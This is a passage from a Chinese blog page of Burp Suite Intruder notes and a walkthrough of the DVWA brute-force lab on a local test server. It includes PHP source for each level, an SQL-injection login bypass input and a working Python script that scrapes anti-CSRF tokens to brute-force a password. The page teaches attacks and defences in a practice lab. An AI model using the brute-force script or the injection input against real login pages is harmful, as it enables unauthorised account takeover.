資訊專欄INFORMATION COLUMN
摘要:運行結果片段發(fā)現(xiàn)密碼的返回長度與其他不同,獲得密碼,爆破成功。源碼分析加入了對登錄失敗次數(shù)做限制,防止爆破用了更為安全的機制防御注入
BurpSuite-Intruder筆記
Burp intruder是一個強大的工具,用于自動對Web應用程序自定義的攻擊。它可以用來自動執(zhí)行所有類型的任務您的測試過程中可能出現(xiàn)的模塊說明
Target 用于配置目標服務器進行攻擊的詳細信息
Positions 設置Payloads的插入點以及攻擊類型(攻擊模式)
Payloads 設置payload,配置字典
Opetions 此選項卡包含了request headers,request engine,attack results ,grep match,grep_extrack,grep payloads和redirections。你可以發(fā)動攻擊之前,在主要Intruder的UI上編輯這些選項,大部分設置也可以在攻擊時對已在運行的窗口進行修改
Burpsuite模塊—-Intruder模塊詳解
Brute Force過關 Low 常規(guī)爆破使用attack type為sniper
payload positions
GET /vulnerabilities/brute/?username=admin&password=§s§&Login=Login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login Connection: close Cookie: PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=low Upgrade-Insecure-Requests: 1
爆破結果
以length排序,發(fā)現(xiàn)密碼為password
" . mysql_error() . "" ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "
Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed echo ""; } mysql_close(); } ?>
Username and/or password incorrect.
if( isset( $_GET[ "Login" ] ) )可以看到,服務器只是驗證了參數(shù)Login是否被設置(isset函數(shù)在php中用來檢測變量是否設置,該函數(shù)返回的是布爾類型的值,即true/false),沒有任何的防爆破機制;
由$pass = md5( $pass );可知程序對輸入的密碼做了md5轉換,因此不能注入攻擊。但是由$user = $_GET[ "username" ];和查詢語句$query = "SELECT * FROM users WHERE user = "$user" AND password = "$pass";";可知,用戶輸入Username:處存在SQL注入。
用戶名輸入admin"#得到:
Medium 常規(guī)爆破可爆破出密碼,速度很慢
源碼分析" . mysql_error() . "" ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "
Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed sleep( 2 ); echo ""; } mysql_close(); } ?>
Username and/or password incorrect.
sleep( 2 ); 使得爆破;速度很慢,但仍然沒有防爆破機制;
對比low的源碼在用戶輸入處加入mysql_real_escape_string函數(shù)做處理,該函數(shù)會對字符串中的特殊符號(x00,n,r,,’,”,x1a)進行轉義,基本上能夠抵御sql注入攻擊(MySQL5.5.37以下版本如果設置編碼為GBK,能夠構造編碼繞過mysql_real_escape_string 對單引號的轉義)PHP字符編碼繞過漏洞總結
high 常規(guī)爆破失敗
源碼分析" . mysql_error() . "" ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "
Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed sleep( rand( 0, 3 ) ); echo ""; } mysql_close(); } // Generate Anti-CSRF token generateSessionToken(); ?>
Username and/or password incorrect.
checkToken( $_REQUEST[ "user_token" ], $_SESSION[ "session_token" ], "index.php" );加入了Anti-CSRFtoken,使得burp suite爆破失效;
正常登錄分析:觀察登錄提交的URL
http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login&user_token=5b8ebd4aed00f92040bf08462ebb774d
發(fā)現(xiàn)較之前多提交了一個參數(shù)user_token,尋找user_token出處;
查看http://127.0.0.1/vulnerabilities/brute/源代碼用戶登錄處:
Vulnerability: Brute Force
Login
Welcome to the password protected area admin
發(fā)現(xiàn)user_token的值;
推測登錄流程:
先從提交表單處獲取user_token的值,在提交表單時加入user_token參數(shù),服務器端驗證user_token的值后再驗證登錄是否成功。
正確爆破姿勢使用Python腳本爆破(BeautifulSoup + urllib.request)
源碼使用if( isset( $_GET[ "Login" ] ) )判斷,未對登錄失敗次數(shù)做限制,因此仍然可以爆破密碼;
使用BeautifulSoup庫從每次請求的頁面中抓取user_token的值,帶入下一次get請求的user_token中。
from bs4 import BeautifulSoup import urllib.request import urllib.error header = { "Host": "127.0.0.1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Referer": "http://127.0.0.1/vulnerabilities/brute/", "Connection": "close", "Cookie": "PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=high" } url = "http://127.0.0.1/vulnerabilities/brute/" def get_user_token(url, header): try: req = urllib.request.Request(url, headers=header) res = urllib.request.urlopen(req) except urllib.error.URLError as e: if hasattr(e, "code"): print(e.code) if hasattr(e, "reason"): print(e.reason) except Exception as e: print(e) else: soup = BeautifulSoup(res.read(), "html.parser") user_token = soup.select("input[type="hidden"]") return user_token[0].get("value") def brute_req(next_url): # next_url = "http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}".format(password, user_token) try: req = urllib.request.Request(next_url, headers=header) res = urllib.request.urlopen(req) except urllib.error.URLError as e: if hasattr(e, "code"): print(e.code) if hasattr(e, "reason"): print(e.reason) except Exception as e: print(e) else: print(str(res.code) + " ", end="") print(len(res.read())) if __name__ == "__main__": with open("password.txt", "r") as fd: password_list = fd.read().split(" ") user_token = get_user_token(url, header) for password in password_list: next_url = "http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}".format( password, user_token) print(password + ":", end="") brute_req(next_url=next_url) user_token = get_user_token(next_url, header)運行結果片段:
roots:200 5031 test:200 5031 test1:200 5031 test123:200 5031 test2:200 5031 password:200 5085 aaaAAA111:200 5031 888888:200 5031 88888888:200 5031 000000:200 5031 00000000:200 5031 111111:200 5031 11111111:200 5031 aaaaaa:200 5031 aaaaaaaa:200 5031 135246:200 5031 135246789:200 5031 123456:200 5031 654321:200 5031 12345:200 5031 54321:200 5031 123456789:200 5031 1234567890:200 5031 123qwe:200 5031發(fā)現(xiàn)password密碼的返回長度與其他不同,獲得密碼,爆破成功。
Impossible 源碼分析prepare( "SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // Check to see if the user has been locked out. if( ( $data->rowCount() == 1 ) && ( $row[ "failed_login" ] >= $total_failed_login ) ) { // User locked out. Note, using this method would allow for user enumeration! //echo ""; // Calculate when the user would be allowed to login again $last_login = $row[ "last_login" ]; $last_login = strtotime( $last_login ); $timeout = strtotime( "{$last_login} +{$lockout_time} minutes" ); $timenow = strtotime( "now" ); // Check to see if enough time has passed, if it hasn"t locked the account if( $timenow > $timeout ) $account_locked = true; } // Check the database (if username matches the password) $data = $db->prepare( "SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR); $data->bindParam( ":password", $pass, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // If its a valid login... if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { // Get users details $avatar = $row[ "avatar" ]; $failed_login = $row[ "failed_login" ]; $last_login = $row[ "last_login" ]; // Login successful echo "
This account has been locked due to too many incorrect logins.Welcome to the password protected area {$user}
"; echo ""; // Had the account been locked out since last login? if( $failed_login >= $total_failed_login ) { echo "Warning: Someone might of been brute forcing your account.
"; echo "Number of login attempts: {$failed_login}.
"; } // Reset bad login count $data = $db->prepare( "UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR ); $data->execute(); } else { // Login failed sleep( rand( 2, 4 ) ); // Give the user some feedback echo "
Last login attempt was at: ${last_login}."; // Update bad login count $data = $db->prepare( "UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR ); $data->execute(); } // Set the last login time $data = $db->prepare( "UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR ); $data->execute(); } // Generate Anti-CSRF token generateSessionToken(); ?>
Username and/or password incorrect.
Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.checkToken( $_REQUEST[ "user_token" ], $_SESSION[ "session_token" ], "index.php" );加入了Anti-CSRFtoken;
對登錄失敗次數(shù)做限制,防止爆破;
用了更為安全的PDO(PHP Data Object)機制防御sql注入
文章版權歸作者所有,未經(jīng)允許請勿轉載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉載請注明本文地址:http://m.specialneedsforspecialkids.com/yun/43973.html
摘要:一簡介是用于解析命令行參數(shù)和選項的標準模塊,用于代替已經(jīng)過時的模塊。二使用步驟爆破成功爆破失敗批量爆破測試版 一、簡介: argparse是python用于解析命令行參數(shù)和選項的標準模塊,用于代替已經(jīng)過時的optparse模塊。argparse模塊的作用是用于解析命令行參數(shù),例如python parseTest.py input.txt output.txt --user=name -...
Problem For a given source string and a target string, you should output the first index(from 0) of target string in source string. If target does not exist in source, just return -1. Note 我終于找到了比較好的K...
閱讀 3464·2021-09-08 10:46
閱讀 1187·2019-08-30 13:17
閱讀 2366·2019-08-30 13:05
閱讀 1209·2019-08-29 15:29
閱讀 2887·2019-08-29 11:31
閱讀 541·2019-08-26 12:13
閱讀 1535·2019-08-26 11:42
閱讀 1838·2019-08-23 18:37
